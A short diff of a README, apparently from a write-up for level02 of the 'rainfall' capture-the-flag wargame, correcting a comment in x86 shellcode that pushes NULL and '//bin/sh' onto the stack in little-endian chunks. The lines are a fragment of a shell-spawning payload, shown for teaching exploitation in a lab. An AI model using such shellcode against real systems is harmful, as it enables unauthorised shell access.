SERAC-SGM/rainfall-42/level02/README.md

 		push	edx		; push NULL

 		; We need to push /bin/sh on the stack using a x86 architecture.
 So we need to push 4 bytes at a time, and in little endian number
-		; /bin is only 3 bytes so we add another / push	0x68732f6e	; hs/n
+		; /bin/sh is only 7 bytes so we add another /  (we need 2x 4 bytes)
+		push	0x68732f6e	; hs/n
 		push	0x69622f2f	; ib// (1)